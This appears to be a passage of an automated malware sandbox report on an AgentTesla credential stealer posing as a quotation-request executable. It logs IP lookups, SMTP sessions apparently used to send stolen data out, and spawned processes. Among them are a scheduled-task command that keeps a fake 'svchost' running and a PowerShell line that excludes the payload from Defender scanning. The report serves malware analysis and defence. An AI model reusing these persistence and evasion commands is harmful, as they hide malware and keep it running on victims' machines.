                                                                        May 8, 2024 09:21:34.695739985 CEST49765587192.168.2.4185.230.214.164
                                                                        May 8, 2024 09:21:34.695739985 CEST49765587192.168.2.4185.230.214.164
                                                                        May 8, 2024 09:21:35.017810106 CEST58749765185.230.214.164192.168.2.4
                                                                        May 8, 2024 09:21:35.017833948 CEST58749765185.230.214.164192.168.2.4
                                                                        May 8, 2024 09:21:35.017942905 CEST58749765185.230.214.164192.168.2.4
                                                                        May 8, 2024 09:21:35.018095970 CEST58749765185.230.214.164192.168.2.4
                                                                        May 8, 2024 09:21:35.086400032 CEST58749765185.230.214.164192.168.2.4
                                                                        May 8, 2024 09:21:35.141108036 CEST49765587192.168.2.4185.230.214.164
                                                                        May 8, 2024 09:22:07.187556028 CEST4972380192.168.2.4199.232.210.172
                                                                        May 8, 2024 09:22:07.187706947 CEST4972480192.168.2.4199.232.210.172
                                                                        May 8, 2024 09:22:07.350658894 CEST8049724199.232.210.172192.168.2.4
                                                                        May 8, 2024 09:22:07.350681067 CEST8049724199.232.210.172192.168.2.4
                                                                        May 8, 2024 09:22:07.350819111 CEST4972480192.168.2.4199.232.210.172
                                                                        May 8, 2024 09:22:07.350837946 CEST8049723199.232.210.172192.168.2.4
                                                                        May 8, 2024 09:22:07.350873947 CEST8049723199.232.210.172192.168.2.4
                                                                        May 8, 2024 09:22:07.350959063 CEST4972380192.168.2.4199.232.210.172
                                                                        May 8, 2024 09:22:52.644767046 CEST49752587192.168.2.4185.230.214.164
                                                                        May 8, 2024 09:22:52.966161966 CEST58749752185.230.214.164192.168.2.4
                                                                        May 8, 2024 09:22:52.966275930 CEST58749752185.230.214.164192.168.2.4
                                                                        May 8, 2024 09:22:52.966306925 CEST58749752185.230.214.164192.168.2.4
                                                                        May 8, 2024 09:22:52.966312885 CEST49752587192.168.2.4185.230.214.164
                                                                        May 8, 2024 09:22:52.966341972 CEST49752587192.168.2.4185.230.214.164
                                                                        May 8, 2024 09:22:52.966945887 CEST49752587192.168.2.4185.230.214.164
                                                                        May 8, 2024 09:22:56.508986950 CEST49748587192.168.2.4185.230.214.164
                                                                        May 8, 2024 09:22:56.828392982 CEST58749748185.230.214.164192.168.2.4
                                                                        May 8, 2024 09:22:56.828555107 CEST58749748185.230.214.164192.168.2.4
                                                                        May 8, 2024 09:22:56.828736067 CEST58749748185.230.214.164192.168.2.4
                                                                        May 8, 2024 09:22:56.828772068 CEST49748587192.168.2.4185.230.214.164
                                                                        May 8, 2024 09:22:56.828774929 CEST58749748185.230.214.164192.168.2.4
                                                                        May 8, 2024 09:22:56.828813076 CEST49748587192.168.2.4185.230.214.164
                                                                        May 8, 2024 09:22:56.829564095 CEST49748587192.168.2.4185.230.214.164

                                                                        UDP Packets

                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                        May 8, 2024 09:21:03.063713074 CEST5069953192.168.2.41.1.1.1
                                                                        May 8, 2024 09:21:03.227633953 CEST53506991.1.1.1192.168.2.4
                                                                        May 8, 2024 09:21:04.877274036 CEST5624553192.168.2.41.1.1.1
                                                                        May 8, 2024 09:21:05.044781923 CEST53562451.1.1.1192.168.2.4
                                                                        May 8, 2024 09:21:11.017276049 CEST5429353192.168.2.41.1.1.1
                                                                        May 8, 2024 09:21:11.185365915 CEST53542931.1.1.1192.168.2.4

                                                                        DNS Queries

                                                                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                        May 8, 2024 09:21:03.063713074 CEST192.168.2.41.1.1.10x517eStandard query (0)api.ipify.orgA (IP address)IN (0x0001)false
                                                                        May 8, 2024 09:21:04.877274036 CEST192.168.2.41.1.1.10xf317Standard query (0)ip-api.comA (IP address)IN (0x0001)false
                                                                        May 8, 2024 09:21:11.017276049 CEST192.168.2.41.1.1.10x8ab4Standard query (0)smtp.zoho.euA (IP address)IN (0x0001)false

                                                                        DNS Answers

                                                                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                        May 8, 2024 09:21:03.227633953 CEST1.1.1.1192.168.2.40x517eNo error (0)api.ipify.org104.26.13.205A (IP address)IN (0x0001)false
                                                                        May 8, 2024 09:21:03.227633953 CEST1.1.1.1192.168.2.40x517eNo error (0)api.ipify.org172.67.74.152A (IP address)IN (0x0001)false
                                                                        May 8, 2024 09:21:03.227633953 CEST1.1.1.1192.168.2.40x517eNo error (0)api.ipify.org104.26.12.205A (IP address)IN (0x0001)false
                                                                        May 8, 2024 09:21:05.044781923 CEST1.1.1.1192.168.2.40xf317No error (0)ip-api.com208.95.112.1A (IP address)IN (0x0001)false
                                                                        May 8, 2024 09:21:10.570144892 CEST1.1.1.1192.168.2.40xac1cNo error (0)bg.microsoft.map.fastly.net199.232.214.172A (IP address)IN (0x0001)false
                                                                        May 8, 2024 09:21:10.570144892 CEST1.1.1.1192.168.2.40xac1cNo error (0)bg.microsoft.map.fastly.net199.232.210.172A (IP address)IN (0x0001)false
                                                                        May 8, 2024 09:21:11.095401049 CEST1.1.1.1192.168.2.40x237eNo error (0)fp2e7a.wpc.2be4.phicdn.netfp2e7a.wpc.phicdn.netCNAME (Canonical name)IN (0x0001)false
                                                                        May 8, 2024 09:21:11.095401049 CEST1.1.1.1192.168.2.40x237eNo error (0)fp2e7a.wpc.phicdn.net192.229.211.108A (IP address)IN (0x0001)false
                                                                        May 8, 2024 09:21:11.185365915 CEST1.1.1.1192.168.2.40x8ab4No error (0)smtp.zoho.eu185.230.214.164A (IP address)IN (0x0001)false

                                                                        HTTP Request Dependency Graph

                                                                        • api.ipify.org
                                                                        • ip-api.com

                                                                        HTTP Packets

                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        0192.168.2.449731208.95.112.1808084C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        May 8, 2024 09:21:05.256422043 CEST80OUTGET /line/?fields=hosting HTTP/1.1
                                                                        Host: ip-api.com
                                                                        Connection: Keep-Alive
                                                                        May 8, 2024 09:21:05.419017076 CEST174INHTTP/1.1 200 OK
                                                                        Date: Wed, 08 May 2024 07:21:04 GMT
                                                                        Content-Type: text/plain; charset=utf-8
                                                                        Content-Length: 5
                                                                        Access-Control-Allow-Origin: *
                                                                        X-Ttl: 60
                                                                        X-Rl: 44
                                                                        Data Raw: 74 72 75 65 0a
                                                                        Data Ascii: true


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        1192.168.2.449733208.95.112.1807752C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        May 8, 2024 09:21:09.701174974 CEST80OUTGET /line/?fields=hosting HTTP/1.1
                                                                        Host: ip-api.com
                                                                        Connection: Keep-Alive
                                                                        May 8, 2024 09:21:09.864020109 CEST174INHTTP/1.1 200 OK
                                                                        Date: Wed, 08 May 2024 07:21:09 GMT
                                                                        Content-Type: text/plain; charset=utf-8
                                                                        Content-Length: 5
                                                                        Access-Control-Allow-Origin: *
                                                                        X-Ttl: 55
                                                                        X-Rl: 43
                                                                        Data Raw: 74 72 75 65 0a
                                                                        Data Ascii: true


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        2192.168.2.449746208.95.112.1807660C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        May 8, 2024 09:21:15.865681887 CEST80OUTGET /line/?fields=hosting HTTP/1.1
                                                                        Host: ip-api.com
                                                                        Connection: Keep-Alive
                                                                        May 8, 2024 09:21:16.029175043 CEST174INHTTP/1.1 200 OK
                                                                        Date: Wed, 08 May 2024 07:21:15 GMT
                                                                        Content-Type: text/plain; charset=utf-8
                                                                        Content-Length: 5
                                                                        Access-Control-Allow-Origin: *
                                                                        X-Ttl: 49
                                                                        X-Rl: 42
                                                                        Data Raw: 74 72 75 65 0a
                                                                        Data Ascii: true


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        3192.168.2.449760208.95.112.1808676C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        May 8, 2024 09:21:25.154541969 CEST80OUTGET /line/?fields=hosting HTTP/1.1
                                                                        Host: ip-api.com
                                                                        Connection: Keep-Alive
                                                                        May 8, 2024 09:21:25.317081928 CEST174INHTTP/1.1 200 OK
                                                                        Date: Wed, 08 May 2024 07:21:24 GMT
                                                                        Content-Type: text/plain; charset=utf-8
                                                                        Content-Length: 5
                                                                        Access-Control-Allow-Origin: *
                                                                        X-Ttl: 40
                                                                        X-Rl: 41
                                                                        Data Raw: 74 72 75 65 0a
                                                                        Data Ascii: true


                                                                        HTTPS Proxied Packets

                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        0192.168.2.449730104.26.13.2054438084C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        2024-05-08 07:21:04 UTC155OUTGET / HTTP/1.1
                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
                                                                        Host: api.ipify.org
                                                                        Connection: Keep-Alive
                                                                        2024-05-08 07:21:04 UTC211INHTTP/1.1 200 OK
                                                                        Date: Wed, 08 May 2024 07:21:04 GMT
                                                                        Content-Type: text/plain
                                                                        Content-Length: 12
                                                                        Connection: close
                                                                        Vary: Origin
                                                                        CF-Cache-Status: DYNAMIC
                                                                        Server: cloudflare
                                                                        CF-RAY: 8807b0dbccee76f8-SEA
                                                                        2024-05-08 07:21:04 UTC12INData Raw: 38 31 2e 31 38 31 2e 36 30 2e 39 32
                                                                        Data Ascii: 81.181.60.92


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        1192.168.2.449732104.26.13.2054437752C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        2024-05-08 07:21:09 UTC155OUTGET / HTTP/1.1
                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
                                                                        Host: api.ipify.org
                                                                        Connection: Keep-Alive
                                                                        2024-05-08 07:21:09 UTC211INHTTP/1.1 200 OK
                                                                        Date: Wed, 08 May 2024 07:21:09 GMT
                                                                        Content-Type: text/plain
                                                                        Content-Length: 12
                                                                        Connection: close
                                                                        Vary: Origin
                                                                        CF-Cache-Status: DYNAMIC
                                                                        Server: cloudflare
                                                                        CF-RAY: 8807b0f9bf36c4c0-SEA
                                                                        2024-05-08 07:21:09 UTC12INData Raw: 38 31 2e 31 38 31 2e 36 30 2e 39 32
                                                                        Data Ascii: 81.181.60.92


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        2192.168.2.449745104.26.13.2054437660C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        2024-05-08 07:21:15 UTC155OUTGET / HTTP/1.1
                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
                                                                        Host: api.ipify.org
                                                                        Connection: Keep-Alive
                                                                        2024-05-08 07:21:15 UTC211INHTTP/1.1 200 OK
                                                                        Date: Wed, 08 May 2024 07:21:15 GMT
                                                                        Content-Type: text/plain
                                                                        Content-Length: 12
                                                                        Connection: close
                                                                        Vary: Origin
                                                                        CF-Cache-Status: DYNAMIC
                                                                        Server: cloudflare
                                                                        CF-RAY: 8807b1203d7e936f-SEA
                                                                        2024-05-08 07:21:15 UTC12INData Raw: 38 31 2e 31 38 31 2e 36 30 2e 39 32
                                                                        Data Ascii: 81.181.60.92


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        3192.168.2.449759104.26.13.2054438676C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        2024-05-08 07:21:23 UTC155OUTGET / HTTP/1.1
                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
                                                                        Host: api.ipify.org
                                                                        Connection: Keep-Alive
                                                                        2024-05-08 07:21:23 UTC211INHTTP/1.1 200 OK
                                                                        Date: Wed, 08 May 2024 07:21:23 GMT
                                                                        Content-Type: text/plain
                                                                        Content-Length: 12
                                                                        Connection: close
                                                                        Vary: Origin
                                                                        CF-Cache-Status: DYNAMIC
                                                                        Server: cloudflare
                                                                        CF-RAY: 8807b1539afc8389-SEA
                                                                        2024-05-08 07:21:23 UTC12INData Raw: 38 31 2e 31 38 31 2e 36 30 2e 39 32
                                                                        Data Ascii: 81.181.60.92


                                                                        SMTP Packets

                                                                        TimestampSource PortDest PortSource IPDest IPCommands
                                                                        May 8, 2024 09:21:11.920242071 CEST58749739185.230.214.164192.168.2.4220 mx.zoho.eu SMTP Server ready May 8, 2024 9:21:11 AM CEST
                                                                        May 8, 2024 09:21:11.920680046 CEST49739587192.168.2.4185.230.214.164EHLO 035347
                                                                        May 8, 2024 09:21:12.468164921 CEST58749739185.230.214.164192.168.2.4250-mx.zoho.eu Hello 035347 (81.181.60.92 (81.181.60.92))
                                                                        May 8, 2024 09:21:12.468178988 CEST58749739185.230.214.164192.168.2.4250-STARTTLS
                                                                        250 SIZE 53477376
                                                                        May 8, 2024 09:21:12.468358040 CEST49739587192.168.2.4185.230.214.164STARTTLS
                                                                        May 8, 2024 09:21:12.793222904 CEST58749739185.230.214.164192.168.2.4220 Ready to start TLS.
                                                                        May 8, 2024 09:21:12.884509087 CEST58749742185.230.214.164192.168.2.4220 mx.zoho.eu SMTP Server ready May 8, 2024 9:21:12 AM CEST
                                                                        May 8, 2024 09:21:12.885888100 CEST49742587192.168.2.4185.230.214.164EHLO 035347
                                                                        May 8, 2024 09:21:13.207757950 CEST58749742185.230.214.164192.168.2.4250-mx.zoho.eu Hello 035347 (81.181.60.92 (81.181.60.92))
                                                                        May 8, 2024 09:21:13.207770109 CEST58749742185.230.214.164192.168.2.4250-STARTTLS
                                                                        May 8, 2024 09:21:13.207781076 CEST58749742185.230.214.164192.168.2.4250 SIZE 53477376
                                                                        May 8, 2024 09:21:13.207923889 CEST49742587192.168.2.4185.230.214.164STARTTLS
                                                                        May 8, 2024 09:21:13.527707100 CEST58749742185.230.214.164192.168.2.4220 Ready to start TLS.
                                                                        May 8, 2024 09:21:17.443345070 CEST58749748185.230.214.164192.168.2.4220 mx.zoho.eu SMTP Server ready May 8, 2024 9:21:17 AM CEST
                                                                        May 8, 2024 09:21:17.443475008 CEST49748587192.168.2.4185.230.214.164EHLO 035347
                                                                        May 8, 2024 09:21:17.621773958 CEST58749749185.230.214.164192.168.2.4220 mx.zoho.eu SMTP Server ready May 8, 2024 9:21:17 AM CEST
                                                                        May 8, 2024 09:21:17.621994972 CEST49749587192.168.2.4185.230.214.164EHLO 035347
                                                                        May 8, 2024 09:21:17.764997005 CEST58749748185.230.214.164192.168.2.4250-mx.zoho.eu Hello 035347 (81.181.60.92 (81.181.60.92))
                                                                        May 8, 2024 09:21:17.765010118 CEST58749748185.230.214.164192.168.2.4250-STARTTLS
                                                                        May 8, 2024 09:21:17.765037060 CEST58749748185.230.214.164192.168.2.4250 SIZE 53477376
                                                                        May 8, 2024 09:21:17.765208006 CEST49748587192.168.2.4185.230.214.164STARTTLS
                                                                        May 8, 2024 09:21:17.943842888 CEST58749749185.230.214.164192.168.2.4250-mx.zoho.eu Hello 035347 (81.181.60.92 (81.181.60.92))
                                                                        May 8, 2024 09:21:17.943862915 CEST58749749185.230.214.164192.168.2.4250-STARTTLS
                                                                        250 SIZE 53477376
                                                                        May 8, 2024 09:21:17.944067001 CEST49749587192.168.2.4185.230.214.164STARTTLS
                                                                        May 8, 2024 09:21:18.084834099 CEST58749748185.230.214.164192.168.2.4220 Ready to start TLS.
                                                                        May 8, 2024 09:21:18.267272949 CEST58749749185.230.214.164192.168.2.4220 Ready to start TLS.
                                                                        May 8, 2024 09:21:18.668009043 CEST58749752185.230.214.164192.168.2.4220 mx.zoho.eu SMTP Server ready May 8, 2024 9:21:18 AM CEST
                                                                        May 8, 2024 09:21:18.668190956 CEST49752587192.168.2.4185.230.214.164EHLO 035347
                                                                        May 8, 2024 09:21:18.989480019 CEST58749752185.230.214.164192.168.2.4250-mx.zoho.eu Hello 035347 (81.181.60.92 (81.181.60.92))
                                                                        May 8, 2024 09:21:18.989521027 CEST58749752185.230.214.164192.168.2.4250-STARTTLS
                                                                        May 8, 2024 09:21:18.989532948 CEST58749752185.230.214.164192.168.2.4250 SIZE 53477376
                                                                        May 8, 2024 09:21:18.989733934 CEST49752587192.168.2.4185.230.214.164STARTTLS
                                                                        May 8, 2024 09:21:19.311316967 CEST58749752185.230.214.164192.168.2.4220 Ready to start TLS.
                                                                        May 8, 2024 09:21:22.878096104 CEST58749758185.230.214.164192.168.2.4220 mx.zoho.eu SMTP Server ready May 8, 2024 9:21:22 AM CEST
                                                                        May 8, 2024 09:21:22.889703989 CEST49758587192.168.2.4185.230.214.164EHLO 035347
                                                                        May 8, 2024 09:21:23.209759951 CEST58749758185.230.214.164192.168.2.4250-mx.zoho.eu Hello 035347 (81.181.60.92 (81.181.60.92))
                                                                        May 8, 2024 09:21:23.209810019 CEST58749758185.230.214.164192.168.2.4250-STARTTLS
                                                                        May 8, 2024 09:21:23.209825993 CEST58749758185.230.214.164192.168.2.4250 SIZE 53477376
                                                                        May 8, 2024 09:21:23.526405096 CEST49758587192.168.2.4185.230.214.164STARTTLS
                                                                        May 8, 2024 09:21:23.848323107 CEST58749758185.230.214.164192.168.2.4220 Ready to start TLS.
                                                                        May 8, 2024 09:21:26.937906981 CEST58749762185.230.214.164192.168.2.4220 mx.zoho.eu SMTP Server ready May 8, 2024 9:21:26 AM CEST
                                                                        May 8, 2024 09:21:26.963848114 CEST49762587192.168.2.4185.230.214.164EHLO 035347
                                                                        May 8, 2024 09:21:27.285952091 CEST58749762185.230.214.164192.168.2.4250-mx.zoho.eu Hello 035347 (81.181.60.92 (81.181.60.92))
                                                                        May 8, 2024 09:21:27.285965919 CEST58749762185.230.214.164192.168.2.4250-STARTTLS
                                                                        250 SIZE 53477376
                                                                        May 8, 2024 09:21:27.291414022 CEST49762587192.168.2.4185.230.214.164STARTTLS
                                                                        May 8, 2024 09:21:27.612814903 CEST58749762185.230.214.164192.168.2.4220 Ready to start TLS.
                                                                        May 8, 2024 09:21:31.749907970 CEST58749765185.230.214.164192.168.2.4220 mx.zoho.eu SMTP Server ready May 8, 2024 9:21:31 AM CEST
                                                                        May 8, 2024 09:21:31.751312971 CEST49765587192.168.2.4185.230.214.164EHLO 035347
                                                                        May 8, 2024 09:21:32.073451996 CEST58749765185.230.214.164192.168.2.4250-mx.zoho.eu Hello 035347 (81.181.60.92 (81.181.60.92))
                                                                        May 8, 2024 09:21:32.073466063 CEST58749765185.230.214.164192.168.2.4250-STARTTLS
                                                                        May 8, 2024 09:21:32.073492050 CEST58749765185.230.214.164192.168.2.4250 SIZE 53477376
                                                                        May 8, 2024 09:21:32.073697090 CEST49765587192.168.2.4185.230.214.164STARTTLS
                                                                        May 8, 2024 09:21:32.397638083 CEST58749765185.230.214.164192.168.2.4220 Ready to start TLS.

                                                                        Statistics

                                                                        CPU Usage

                                                                        Click to jump to process

                                                                        Memory Usage

                                                                        Click to jump to process

                                                                        High Level Behavior Distribution

                                                                        Click to dive into process behavior distribution

                                                                        Behavior

                                                                        Click to jump to process

                                                                        System Behavior

                                                                        General

                                                                        Target ID:0
                                                                        Start time:09:20:50
                                                                        Start date:08/05/2024
                                                                        Path:C:\Users\user\Desktop\RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRY.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:"C:\Users\user\Desktop\RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRY.exe"
                                                                        Imagebase:0x2091d7b0000
                                                                        File size:690'092 bytes
                                                                        MD5 hash:E184C8B191B12744E919B3B95CE39A0E
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Yara matches:
                                                                        • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000000.00000002.1664238561.000002091F69C000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                        Reputation:low
                                                                        Has exited:true

                                                                        General

                                                                        Target ID:1
                                                                        Start time:09:20:50
                                                                        Start date:08/05/2024
                                                                        Path:C:\Windows\System32\conhost.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                        Imagebase:0x7ff7699e0000
                                                                        File size:862'208 bytes
                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Reputation:high
                                                                        Has exited:true

                                                                        General

                                                                        Target ID:2
                                                                        Start time:09:20:54
                                                                        Start date:08/05/2024
                                                                        Path:C:\Windows\System32\cmd.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "svchost" /tr '"C:\Users\user\AppData\Roaming\svchost.exe"' & exit
                                                                        Imagebase:0x7ff65faa0000
                                                                        File size:289'792 bytes
                                                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Reputation:high
                                                                        Has exited:true

                                                                        General

                                                                        Target ID:3
                                                                        Start time:09:20:54
                                                                        Start date:08/05/2024
                                                                        Path:C:\Windows\System32\conhost.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                        Imagebase:0x7ff7699e0000
                                                                        File size:862'208 bytes
                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Reputation:high
                                                                        Has exited:true

                                                                        General

                                                                        Target ID:4
                                                                        Start time:09:20:54
                                                                        Start date:08/05/2024
                                                                        Path:C:\Windows\System32\cmd.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\tmp89F4.tmp.bat""
                                                                        Imagebase:0x7ff65faa0000
                                                                        File size:289'792 bytes
                                                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Reputation:high
                                                                        Has exited:true

                                                                        General

                                                                        Target ID:5
                                                                        Start time:09:20:54
                                                                        Start date:08/05/2024
                                                                        Path:C:\Windows\System32\conhost.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                        Imagebase:0x7ff7699e0000
                                                                        File size:862'208 bytes
                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Reputation:high
                                                                        Has exited:true

                                                                        General

                                                                        Target ID:6
                                                                        Start time:09:20:54
                                                                        Start date:08/05/2024
                                                                        Path:C:\Windows\System32\schtasks.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:schtasks /create /f /sc onlogon /rl highest /tn "svchost" /tr '"C:\Users\user\AppData\Roaming\svchost.exe"'
                                                                        Imagebase:0x7ff76f990000
                                                                        File size:235'008 bytes
                                                                        MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Reputation:high
                                                                        Has exited:true

                                                                        General

                                                                        Target ID:7
                                                                        Start time:09:20:54
                                                                        Start date:08/05/2024
                                                                        Path:C:\Windows\System32\timeout.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:timeout 3
                                                                        Imagebase:0x7ff7c3c90000
                                                                        File size:32'768 bytes
                                                                        MD5 hash:100065E21CFBBDE57CBA2838921F84D6
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Reputation:moderate
                                                                        Has exited:true

                                                                        General

                                                                        Target ID:8
                                                                        Start time:09:20:55
                                                                        Start date:08/05/2024
                                                                        Path:C:\Users\user\AppData\Roaming\svchost.exe
                                                                        Wow64 process (32bit):true
                                                                        Commandline:C:\Users\user\AppData\Roaming\svchost.exe
                                                                        Imagebase:0x800000
                                                                        File size:690'092 bytes
                                                                        MD5 hash:E184C8B191B12744E919B3B95CE39A0E
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Yara matches:
                                                                        • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000008.00000002.1993738956.000001A48033C000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                        Antivirus matches:
                                                                        • Detection: 37%, ReversingLabs
                                                                        • Detection: 36%, Virustotal, Browse
                                                                        Reputation:low
                                                                        Has exited:true

                                                                        General

                                                                        Target ID:9
                                                                        Start time:09:20:55
                                                                        Start date:08/05/2024
                                                                        Path:C:\Windows\System32\conhost.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                        Imagebase:0x7ff7699e0000
                                                                        File size:862'208 bytes
                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Reputation:high
                                                                        Has exited:true

                                                                        General

                                                                        Target ID:10
                                                                        Start time:09:20:58
                                                                        Start date:08/05/2024
                                                                        Path:C:\Users\user\AppData\Roaming\svchost.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:"C:\Users\user\AppData\Roaming\svchost.exe"
                                                                        Imagebase:0x216f6f20000
                                                                        File size:690'092 bytes
                                                                        MD5 hash:E184C8B191B12744E919B3B95CE39A0E
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Yara matches:
                                                                        • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 0000000A.00000002.1920918632.000002168033C000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000A.00000002.1951190826.0000021690011000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                        • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000A.00000002.1951190826.0000021690011000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000A.00000002.1951190826.0000021690133000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                        • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000A.00000002.1951190826.0000021690133000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                        Reputation:low
                                                                        Has exited:true

                                                                        General

                                                                        Target ID:11
                                                                        Start time:09:20:58
                                                                        Start date:08/05/2024
                                                                        Path:C:\Windows\System32\conhost.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                        Imagebase:0x7ff7699e0000
                                                                        File size:862'208 bytes
                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Reputation:high
                                                                        Has exited:true

                                                                        General

                                                                        Target ID:12
                                                                        Start time:09:21:00
                                                                        Start date:08/05/2024
                                                                        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\svchost.exe" -Force
                                                                        Imagebase:0x7ff788560000
                                                                        File size:452'608 bytes
                                                                        MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Reputation:high
                                                                        Has exited:true

                                                                        General

                                                                        Target ID:13
                                                                        Start time:09:21:01
                                                                        Start date:08/05/2024
                                                                        Path:C:\Windows\System32\conhost.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                        Imagebase:0x7ff7699e0000
                                                                        File size:862'208 bytes
                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Reputation:high
                                                                        Has exited:true

                                                                        General

                                                                        Target ID:14
                                                                        Start time:09:21:01
                                                                        Start date:08/05/2024
                                                                        Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                        Wow64 process (32bit):false
